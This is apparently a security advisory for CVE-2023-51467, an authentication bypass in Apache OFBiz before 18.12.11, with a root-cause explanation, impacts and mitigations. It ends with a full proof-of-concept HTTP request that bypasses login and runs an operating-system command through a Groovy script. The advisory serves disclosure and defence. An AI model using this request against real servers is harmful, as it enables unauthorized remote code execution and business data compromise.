Vulnerable Version
Apache:OFBiz < 18.12.11
Fixed Version
OFBiz 18.12.11
Base Score
9.8 CRITICAL
Vendor Description:-
Apache OFBiz is an open-source ERP framework. It supports a wide range of online applications used for
a variety of company operations, including human resources, accounting, inventory management,
customer relationship management, and marketing. This software, while less common than certain
commercial equivalents, is critical to enterprises who rely on it for sensitive business activities.
CVE-2023-51467 Description: –
This vulnerability occurs as a result of incomplete fixing for CVE-2023-49070. In Apache OFBiz version 18.12.10, the developers removed the XMLRPC to fix the previous RCE issue, but the authentication bypass still exists.
In this test scenario, the USERNAME and PASSWORD parameters are left blank, and the URI contains the parameter requirePasswordChange=Y.
The login method returns the value requirePasswordChange since the username and password are both empty, and requirePasswordChange is set to ‘Y.’ These values are then given through the checkLogin method. Surprisingly, the flow does not enter the conditional block since the Boolean checks (username == null) and (password == null) return false when both parameters are empty. Additionally, the “error”.equals(login(request, response)) returns false because the login function’s return value was requirePasswordChange.
As a result, the checkLogin method returns successfully, allowing authentication to be bypassed.
Impact:-
Organizations relying on Apache OFBiz may be at risk of:
- Unauthorized information access
- Loss of data integrity
- Compromise of sensitive business information
- Total control of affected server environments by malicious actors
Mitigations:-
Upgrade to Apache OFBiz 18.12.11
- This version includes the official patch addressing the insecure request handler vulnerability.
Restrict Network Access
- Until the upgrade is performed, limit external access to the OFBiz instance using firewall rules or reverse proxy controls.
Monitor for Unusual Activity
- Review access logs for unauthorized or unauthenticated access attempts to internal endpoints.
Apply Web Application Firewall (WAF) Rules
- Use a WAF to block suspicious or malformed requests that attempt to exploit the request bypass vulnerability.
POC:-
Send following request to execute command id by Groovy script:
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.1.17:8443
Cookie: JSESSIONID=A901D3EC27EAE7090061788B37301695.jvm1; OFBiz.Visitor=10001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
groovyProgram=throw+new+Exception('id'.execute().text);